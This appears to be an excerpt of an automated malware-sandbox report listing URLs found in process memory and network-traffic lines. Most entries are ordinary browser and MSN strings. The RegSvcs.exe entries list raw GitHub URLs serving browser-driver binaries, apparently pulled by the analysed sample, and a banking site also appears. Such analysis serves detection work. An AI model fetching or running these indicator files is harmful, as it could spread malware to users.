Source: firefox.exe, 00000022.00000003.3220315626.0000026F47F85000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 00000022.00000003.3206789635.0000026F45480000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://firefox-settings-attachments.cdn.mozilla.net/main-workspace/ms-images/673d2808-e5d8-41b9-957
Source: firefox.exe, 00000022.00000003.3220315626.0000026F47F85000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 00000022.00000003.3206789635.0000026F45480000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 00000022.00000003.3220117063.0000026F3D29D000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://firefox-settings-attachments.cdn.mozilla.net/main-workspace/ms-images/706c7a85-cf23-442e-8a9
Source: firefox.exe, 00000022.00000003.3220315626.0000026F47FFC000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://firefox-settings-attachments.cdn.mozilla.net/main-workspace/ms-images/74f06853-c80d-4afc-9b2
Source: firefox.exe, 00000022.00000003.3220315626.0000026F47F85000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://firefox-settings-attachments.cdn.mozilla.net/main-workspace/ms-images/d8e772fe-4909-4f05-9f9
Source: firefox.exe, 00000022.00000003.3220315626.0000026F47F85000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://firefox-settings-attachments.cdn.mozilla.net/main-workspace/ms-images/f0f51715-7f5e-48de-839
Source: firefox.exe, 00000022.00000003.3363489779.0000026F37D83000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 00000022.00000003.3328972231.0000026F37D83000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 00000022.00000003.3256777189.0000026F37DA5000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://firefox-source-docs.mozilla.org/remote/Security.html
Source: firefox.exe, 00000022.00000003.3235424057.0000026F3D3B5000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 00000022.00000003.3308179636.0000026F3D3BA000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://firefox.settings.services.mozilla.com/v1/buckets/main-preview/collections/search-config/reco
Source: firefox.exe, 00000022.00000003.3235424057.0000026F3D3B5000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 00000022.00000003.3308179636.0000026F3D3BA000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://firefox.settings.services.mozilla.com/v1/buckets/main/collections/search-config/records
Source: svchost.exe, 00000010.00000003.2779868279.0000023EBA401000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://g.live.com/odclientsettings/Prod/C:
Source: svchost.exe, 00000010.00000003.2779868279.0000023EBA390000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://g.live.com/odclientsettings/ProdV2/C:
Source: firefox.exe, 00000022.00000003.3204241012.0000026F3D0F5000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://getpocket.com/explore/entertainment?utm_source=pocket-newtab
Source: firefox.exe, 00000022.00000003.3204241012.0000026F3D0F5000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://getpocket.com/explore/self-improvement?utm_source=pocket-newtab
Source: firefox.exe, 00000022.00000003.3204241012.0000026F3D0F5000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://getpocket.com/explore/self-improvement?utm_source=pocket-newtabhttps://getpocket.com/explore
Source: firefox.exe, 00000022.00000003.3204241012.0000026F3D0F5000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://getpocket.com/explore/technology?utm_source=pocket-newtab
Source: firefox.exe, 00000022.00000003.3204241012.0000026F3D0F5000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://getpocket.com/explore/technology?utm_source=pocket-newtab(
Source: RegSvcs.exe, 0000000B.00000002.3946822654.0000000002A83000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://github.com/DFfe9ewf/test3/raw/refs/heads/main/WebDriver.dll
Source: RegSvcs.exe, 0000000B.00000002.3946822654.0000000002A83000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://github.com/DFfe9ewf/test3/raw/refs/heads/main/chromedriver.exe
Source: RegSvcs.exe, 0000000B.00000002.3946822654.0000000002A83000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://github.com/DFfe9ewf/test3/raw/refs/heads/main/msedgedriver.exe
Source: powershell.exe, 00000008.00000002.2447416420.0000000004B16000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000008.00000002.2440501639.0000000000DC4000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://github.com/Pester/Pester
Source: firefox.exe, 00000022.00000003.3388646094.0000026F45683000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://github.com/google/closure-compiler/issues/3177
Source: firefox.exe, 00000022.00000003.3388646094.0000026F456CB000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://github.com/lit/lit/blob/main/packages/reactive-element/src/decorators/query-all.ts
Source: firefox.exe, 00000022.00000003.3388646094.0000026F456CB000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://github.com/lit/lit/blob/main/packages/reactive-element/src/decorators/query.ts
Source: firefox.exe, 00000022.00000003.3388646094.0000026F45683000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://github.com/lit/lit/issues/1266
Source: firefox.exe, 00000022.00000003.3388646094.0000026F45683000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://github.com/microsoft/TypeScript/issues/338).
Source: firefox.exe, 00000022.00000003.3159401246.0000026F3D0B9000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 00000022.00000003.3159443093.0000026F3D0BF000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://github.com/mozilla-services/screenshots
Source: firefox.exe, 00000022.00000003.3204241012.0000026F3D0F5000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://github.com/w3c/csswg-drafts/issues/4650
Source: firefox.exe, 00000022.00000003.3204241012.0000026F3D0F5000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://github.com/w3c/csswg-drafts/issues/4650layout.css.grid-template-masonry-value.enabledexperim
Source: powershell.exe, 00000000.00000002.1505236184.000001F062AE5000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://go.micro
Source: firefox.exe, 00000022.00000003.3333559112.0000026F44D4F000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 00000022.00000003.3239933873.0000026F44D4F000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 00000022.00000003.3381335714.0000026F44D4F000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 00000022.00000003.3305000079.0000026F44D4F000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 00000022.00000003.3394215031.0000026F44D4F000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://google.com
Source: firefox.exe, 00000022.00000003.3204241012.0000026F3D0F5000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://gpuweb.github.io/gpuweb/
Source: firefox.exe, 00000022.00000003.3395419152.0000026F45B3C000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://ib.absa.co.za/
Source: explorer.exe, 0000000F.00000002.3940177272.0000000006FD5000.00000004.00000020.00020000.00000000.sdmp, explorer.exe, 0000000F.00000003.2779814531.0000000006FD5000.00000004.00000020.00020000.00000000.sdmp, explorer.exe, 0000000F.00000003.2782585892.0000000006FF7000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://img-s-msn-com.akamaized.net/tenant/amp/entityid/AA11f7Wa.img
Source: explorer.exe, 0000000F.00000002.3940177272.0000000006FD5000.00000004.00000020.00020000.00000000.sdmp, explorer.exe, 0000000F.00000003.2779814531.0000000006FD5000.00000004.00000020.00020000.00000000.sdmp, explorer.exe, 0000000F.00000003.2782585892.0000000006FF7000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://img-s-msn-com.akamaized.net/tenant/amp/entityid/AA15Yat4.img
Source: explorer.exe, 0000000F.00000002.3940177272.0000000006FD5000.00000004.00000020.00020000.00000000.sdmp, explorer.exe, 0000000F.00000003.2779814531.0000000006FD5000.00000004.00000020.00020000.00000000.sdmp, explorer.exe, 0000000F.00000003.2782585892.0000000006FF7000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://img-s-msn-com.akamaized.net/tenant/amp/entityid/AA1b2aMG.img
Source: explorer.exe, 0000000F.00000002.3940177272.0000000006FD5000.00000004.00000020.00020000.00000000.sdmp, explorer.exe, 0000000F.00000003.2779814531.0000000006FD5000.00000004.00000020.00020000.00000000.sdmp, explorer.exe, 0000000F.00000003.2782585892.0000000006FF7000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://img-s-msn-com.akamaized.net/tenant/amp/entityid/AA1bjET8.img
Source: explorer.exe, 0000000F.00000002.3940177272.0000000006FD5000.00000004.00000020.00020000.00000000.sdmp, explorer.exe, 0000000F.00000003.2779814531.0000000006FD5000.00000004.00000020.00020000.00000000.sdmp, explorer.exe, 0000000F.00000003.2782585892.0000000006FF7000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://img-s-msn-com.akamaized.net/tenant/amp/entityid/AA1hGNsX.img
Source: explorer.exe, 0000000F.00000003.2779814531.0000000006FD5000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://img-s-msn-com.akamaized.net/tenant/amp/entityid/AA1hHW7F.img
Source: explorer.exe, 0000000F.00000002.3940177272.0000000006FD5000.00000004.00000020.00020000.00000000.sdmp, explorer.exe, 0000000F.00000003.2779814531.0000000006FD5000.00000004.00000020.00020000.00000000.sdmp, explorer.exe, 0000000F.00000003.2782585892.0000000006FF7000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://img-s-msn-com.akamaized.net/tenant/amp/entityid/AAT0qC2.img
Source: explorer.exe, 0000000F.00000002.3940177272.0000000006FD5000.00000004.00000020.00020000.00000000.sdmp, explorer.exe, 0000000F.00000003.2779814531.0000000006FD5000.00000004.00000020.00020000.00000000.sdmp, explorer.exe, 0000000F.00000003.2782585892.0000000006FF7000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://img-s-msn-com.akamaized.net/tenant/amp/entityid/BBNvr53.img
Source: explorer.exe, 0000000F.00000002.3940177272.0000000006FD5000.00000004.00000020.00020000.00000000.sdmp, explorer.exe, 0000000F.00000003.2779814531.0000000006FD5000.00000004.00000020.00020000.00000000.sdmp, explorer.exe, 0000000F.00000003.2782585892.0000000006FF7000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://img-s-msn-com.akamaized.net/tenant/amp/entityid/BBYTL1i.img
Source: firefox.exe, 00000022.00000003.3388646094.0000026F45683000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://infra.spec.whatwg.org/#ascii-whitespace
Source: firefox.exe, 00000022.00000003.3388646094.0000026F45683000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://lit.dev/docs/libraries/standalone-templates/#rendering-lit-html-templates
Source: firefox.exe, 00000022.00000003.3388646094.0000026F45683000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://lit.dev/docs/templates/directives/#stylemap
Source: firefox.exe, 00000022.00000003.3388646094.0000026F45683000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://lit.dev/docs/templates/expressions/#child-expressions)
Source: firefox.exe, 00000022.00000003.3395419152.0000026F45B3C000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://lookerstudio.google.com/embed/reporting/
Source: firefox.exe, 00000022.00000003.3386872677.0000026F3DC14000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://merino.services.mozilla.com/api/v1/suggest
Source: firefox.exe, 00000022.00000003.3306744981.0000026F484B9000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://mochitest.youtube.com/
Source: firefox.exe, 00000022.00000003.3133549240.0000026F3B01D000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://mozilla.org/
Source: firefox.exe, 00000022.00000003.3331253016.0000026F376C3000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://mzl.la/3NS9KJd
Source: powershell.exe, 00000000.00000002.1505236184.000001F063666000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000000.00000002.1531539658.000001F07218D000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000008.00000002.2467970634.0000000005D05000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000008.00000002.2447416420.00000000052D5000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://nuget.org/nuget.exe
Source: powershell.exe, 00000000.00000002.1505236184.000001F0632B7000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://oneget.org
Source: powershell.exe, 00000000.00000002.1505236184.000001F0632B7000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://oneget.orgX
Source: firefox.exe, 00000022.00000003.3228822106.0000026F484B9000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 00000022.00000003.3326736369.0000026F484B9000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 00000022.00000003.3306744981.0000026F484B9000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://play.hbomax.com/page/
Source: firefox.exe, 00000022.00000003.3228822106.0000026F484B9000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 00000022.00000003.3326736369.0000026F484B9000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 00000022.00000003.3306744981.0000026F484B9000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://play.hbomax.com/player/
Source: firefox.exe, 00000022.00000003.3340592060.0000026F3A6D1000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 00000022.00000003.3229982271.0000026F3A6D1000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 00000022.00000003.3389506213.0000026F3A6D1000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://profiler.firefox.comTY8H
Source: firefox.exe, 00000022.00000003.3280986873.0000026F3BB15000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://searchfox.org/mozilla-central/source/toolkit/components/search/SearchUtils.jsm#145-152
Source: RegSvcs.exe, 0000000B.00000002.3946822654.0000000002A83000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://stackoverflow.com/q/11564914/23354;
Source: RegSvcs.exe, 0000000B.00000002.3946822654.0000000002A83000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://stackoverflow.com/q/14436606/23354
Source: RegSvcs.exe, 0000000B.00000002.3946822654.0000000002A83000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://stackoverflow.com/q/2152978/23354rCannot
Source: firefox.exe, 00000022.00000003.3220315626.0000026F47F85000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://support.mozilla.org/1/firefox/%VERSION%/%OS%/%LOCALE%/switching-devices?utm_source=panel-def
Source: firefox.exe, 00000022.00000003.3220315626.0000026F47F85000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://support.mozilla.org/1/firefox/%VERSION%/%OS%/%LOCALE%/switching-devices?utm_source=spotlight
Source: firefox.exe, 00000022.00000003.3274543255.0000026F3C7AE000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://support.mozilla.org/kb/firefox-crashes-troubleshoot-prevent-and-get-help
Source: firefox.exe, 00000022.00000003.3274543255.0000026F3C7AE000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://support.mozilla.org/kb/refresh-firefox-reset-add-ons-and-settings
Source: firefox.exe, 00000022.00000003.3315608639.0000026F44D1E000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 00000022.00000003.3388065723.0000026F44D1E000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 00000022.00000003.3394215031.0000026F44D1E000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://support.mozilla.org/kb/warning-unresponsive-script#w_other-causes
Source: firefox.exe, 00000022.00000003.3388646094.0000026F45683000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://tc39.github.io/ecma262/#sec-typeof-operator
Source: firefox.exe, 00000022.00000003.3333559112.0000026F44D4F000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 00000022.00000003.3239933873.0000026F44D4F000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 00000022.00000003.3381335714.0000026F44D4F000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 00000022.00000003.3305000079.0000026F44D4F000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 00000022.00000003.3394215031.0000026F44D4F000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://twitter.com
Source: explorer.exe, 0000000F.00000002.3940177272.0000000006FD5000.00000004.00000020.00020000.00000000.sdmp, explorer.exe, 0000000F.00000003.2779814531.0000000006FD5000.00000004.00000020.00020000.00000000.sdmp, explorer.exe, 0000000F.00000003.2782585892.0000000006FF7000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://upload.wikimedia.org/wikipedia/commons/thumb/8/84/Zealandia-Continent_map_en.svg/1870px-Zeal
Source: firefox.exe, 00000022.00000003.3388646094.0000026F45683000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://wicg.github.io/construct-stylesheets/#using-constructed-stylesheets).
Source: explorer.exe, 0000000F.00000002.3940177272.0000000006FD5000.00000004.00000020.00020000.00000000.sdmp, explorer.exe, 0000000F.00000003.2779814531.0000000006FD5000.00000004.00000020.00020000.00000000.sdmp, explorer.exe, 0000000F.00000003.2782585892.0000000006FF7000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://windows.msn.com:443/shell?osLocale=en-GB&chosenMarketReason=ImplicitNew
Source: explorer.exe, 0000000F.00000002.3940177272.0000000006FD5000.00000004.00000020.00020000.00000000.sdmp, explorer.exe, 0000000F.00000003.2779814531.0000000006FD5000.00000004.00000020.00020000.00000000.sdmp, explorer.exe, 0000000F.00000003.2782585892.0000000006FF7000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://windows.msn.com:443/shellv2?osLocale=en-GB&chosenMarketReason=ImplicitNew
Source: firefox.exe, 00000022.00000003.3271480907.0000026F3BB67000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://www.amazon.com/exec/obidos/external-search/
Source: firefox.exe, 00000022.00000003.3181348457.0000026F46F11000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://www.google.com/complete/search
Source: firefox.exe, 00000022.00000003.3271480907.0000026F3BB67000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://www.google.com/search
Source: firefox.exe, 00000022.00000003.3372298677.0000026F3D20F000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://www.google.com/search?client=firefox-b-d&q=
Source: firefox.exe, 00000022.00000003.3228822106.0000026F484B9000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 00000022.00000003.3326736369.0000026F484B9000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 00000022.00000003.3306744981.0000026F484B9000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://www.hulu.com/watch/
Source: firefox.exe, 00000022.00000003.3228822106.0000026F484B9000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 00000022.00000003.3326736369.0000026F484B9000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 00000022.00000003.3306744981.0000026F484B9000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://www.instagram.com/
Source: firefox.exe, 00000022.00000003.3220315626.0000026F47F85000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 00000022.00000003.3206789635.0000026F45480000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 00000022.00000003.3220117063.0000026F3D29D000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://www.mozilla.org/about/legal/terms/mozilla/
Source: firefox.exe, 00000022.00000003.3204241012.0000026F3D0F5000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://www.mozilla.org/anything/?
Source: firefox.exe, 00000022.00000003.3204241012.0000026F3D0F5000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://www.mozilla.org/anything/?getTargetingParameters/resolve/promises
Source: firefox.exe, 00000022.00000003.3220315626.0000026F47F85000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 00000022.00000003.3220315626.0000026F47FFC000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://www.mozilla.org/firefox/mobile/get-app/?utm_medium=firefox-desktop&utm_source=onboarding-mod
Source: firefox.exe, 00000022.00000003.3360139379.0000026F3E66B000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://www.mozilla.org/firefox/new/
Source: firefox.exe, 00000022.00000003.3204241012.0000026F3D0F5000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://www.mozilla.org/privacy/firefox/#suggest-relevant-content
Source: firefox.exe, 00000022.00000003.3204241012.0000026F3D0F5000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://www.mozilla.org/privacy/firefox/#suggest-relevant-contentFirefox
Source: explorer.exe, 0000000F.00000003.2779814531.0000000006FD5000.00000004.00000020.00020000.00000000.sdmp, explorer.exe, 0000000F.00000003.2782585892.0000000006FF7000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://www.msn.com/en-us/
Source: explorer.exe, 0000000F.00000002.3940177272.0000000006FD5000.00000004.00000020.00020000.00000000.sdmp, explorer.exe, 0000000F.00000003.2779814531.0000000006FD5000.00000004.00000020.00020000.00000000.sdmp, explorer.exe, 0000000F.00000003.2782585892.0000000006FF7000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://www.msn.com/en-us/health/medical/not-wearing-your-glasses-could-increase-your-chance-of-gett
Source: explorer.exe, 0000000F.00000003.2779814531.0000000006FD5000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://www.msn.com/en-us/health/other/say-goodbye-to-the-covid-19-vaccination-card/ar-AA1hHYLu
Source: explorer.exe, 0000000F.00000003.2782585892.0000000006FF7000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://www.msn.com/en-us/money/caree
Source: explorer.exe, 0000000F.00000002.3940177272.0000000006FD5000.00000004.00000020.00020000.00000000.sdmp, explorer.exe, 0000000F.00000003.2779814531.0000000006FD5000.00000004.00000020.00020000.00000000.sdmp, explorer.exe, 0000000F.00000003.2782585892.0000000006FF7000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://www.msn.com/en-us/money/careersandeducation/student-loan-debt-forgiveness-arrives-for-some-b
Source: explorer.exe, 0000000F.00000003.2782585892.0000000006FF7000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://www.msn.com/en-us/money/markets/costco-is-seeing-a-gold-rush-what-s-behind-the-demand-for-it
Source: explorer.exe, 0000000F.00000002.3940177272.0000000006FD5000.00000004.00000020.00020000.00000000.sdmp, explorer.exe, 0000000F.00000003.2779814531.0000000006FD5000.00000004.00000020.00020000.00000000.sdmp, explorer.exe, 0000000F.00000003.2782585892.0000000006FF7000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://www.msn.com/en-us/money/personalfinance/the-big-3-mistakes-financial-advisors-say-that-the-1
Source: explorer.exe, 0000000F.00000002.3940177272.0000000006FD5000.00000004.00000020.00020000.00000000.sdmp, explorer.exe, 0000000F.00000003.2779814531.0000000006FD5000.00000004.00000020.00020000.00000000.sdmp, explorer.exe, 0000000F.00000003.2782585892.0000000006FF7000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://www.msn.com/en-us/money/personalfinance/the-no-1-phrase-people-who-are-good-at-small-talk-al
Source: explorer.exe, 0000000F.00000002.3940177272.0000000006FD5000.00000004.00000020.00020000.00000000.sdmp, explorer.exe, 0000000F.00000003.2779814531.0000000006FD5000.00000004.00000020.00020000.00000000.sdmp, explorer.exe, 0000000F.00000003.2782585892.0000000006FF7000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://www.msn.com/en-us/news/politics/kinzinger-has-theory-about-who-next-house-speaker-will-be/vi
Source: explorer.exe, 0000000F.00000002.3940177272.0000000006FD5000.00000004.00000020.00020000.00000000.sdmp, explorer.exe, 0000000F.00000003.2779814531.0000000006FD5000.00000004.00000020.00020000.00000000.sdmp, explorer.exe, 0000000F.00000003.2782585892.0000000006FF7000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://www.msn.com/en-us/news/us/dumb-and-dumber-12-states-with-the-absolute-worst-education-in-the
Source: explorer.exe, 0000000F.00000002.3940177272.0000000006FD5000.00000004.00000020.00020000.00000000.sdmp, explorer.exe, 0000000F.00000003.2779814531.0000000006FD5000.00000004.00000020.00020000.00000000.sdmp, explorer.exe, 0000000F.00000003.2782585892.0000000006FF7000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://www.msn.com/en-us/sports/other/predicting-what-the-pac-12-would-look-like-after-expansion-wi
Source: explorer.exe, 0000000F.00000002.3940177272.0000000006FD5000.00000004.00000020.00020000.00000000.sdmp, explorer.exe, 0000000F.00000003.2779814531.0000000006FD5000.00000004.00000020.00020000.00000000.sdmp, explorer.exe, 0000000F.00000003.2782585892.0000000006FF7000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://www.msn.com/en-us/sports/other/simone-biles-leads-u-s-women-s-team-to-seventh-straight-world
Source: explorer.exe, 0000000F.00000002.3940177272.0000000006FD5000.00000004.00000020.00020000.00000000.sdmp, explorer.exe, 0000000F.00000003.2779814531.0000000006FD5000.00000004.00000020.00020000.00000000.sdmp, explorer.exe, 0000000F.00000003.2782585892.0000000006FF7000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://www.msn.com/en-us/sports/other/washington-state-ad-asks-ncaa-for-compassion-and-understandin
Source: explorer.exe, 0000000F.00000002.3940177272.0000000006FD5000.00000004.00000020.00020000.00000000.sdmp, explorer.exe, 0000000F.00000003.2779814531.0000000006FD5000.00000004.00000020.00020000.00000000.sdmp, explorer.exe, 0000000F.00000003.2782585892.0000000006FF7000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://www.msn.com/en-us/weather/topstories/accuweather-el-ni
Source: explorer.exe, 0000000F.00000002.3940177272.0000000006FD5000.00000004.00000020.00020000.00000000.sdmp, explorer.exe, 0000000F.00000003.2779814531.0000000006FD5000.00000004.00000020.00020000.00000000.sdmp, explorer.exe, 0000000F.00000003.2782585892.0000000006FF7000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://www.msn.com/en-us/weather/topstories/first-map-of-earth-s-lost-continent-has-been-published/
Source: explorer.exe, 0000000F.00000002.3940177272.0000000006FD5000.00000004.00000020.00020000.00000000.sdmp, explorer.exe, 0000000F.00000003.2779814531.0000000006FD5000.00000004.00000020.00020000.00000000.sdmp, explorer.exe, 0000000F.00000003.2782585892.0000000006FF7000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://www.msn.com/en-us/weather/topstories/stop-planting-new-forests-scientists-say/ar-AA1hFI09
Source: explorer.exe, 0000000F.00000002.3940177272.0000000006FD5000.00000004.00000020.00020000.00000000.sdmp, explorer.exe, 0000000F.00000003.2779814531.0000000006FD5000.00000004.00000020.00020000.00000000.sdmp, explorer.exe, 0000000F.00000003.2782585892.0000000006FF7000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://www.msn.com/en-us/weather/topstories/us-winter-forecast-for-the-2023-2024-season/ar-AA1hGINt
Source: explorer.exe, 0000000F.00000002.3940177272.0000000006FD5000.00000004.00000020.00020000.00000000.sdmp, explorer.exe, 0000000F.00000003.2779814531.0000000006FD5000.00000004.00000020.00020000.00000000.sdmp, explorer.exe, 0000000F.00000003.2782585892.0000000006FF7000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://www.msn.com:443/en-us/feed
Source: firefox.exe, 00000022.00000003.3395309762.0000026F45BDF000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://www.tiktok.com/
Source: firefox.exe, 00000022.00000003.3333559112.0000026F44D4F000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 00000022.00000003.3239933873.0000026F44D4F000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 00000022.00000003.3381335714.0000026F44D4F000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 00000022.00000003.3305000079.0000026F44D4F000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 00000022.00000003.3394215031.0000026F44D4F000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://yandex.com

Source: unknown	Network traffic detected: HTTP traffic on port 50131 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 50395 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 50257 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 50177 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 50383 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 50360 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 50314 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 50165 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 49703 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 50222 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 50325 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 50268 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 50292 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 50359 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 50246 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 50371 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 50291 -> 443
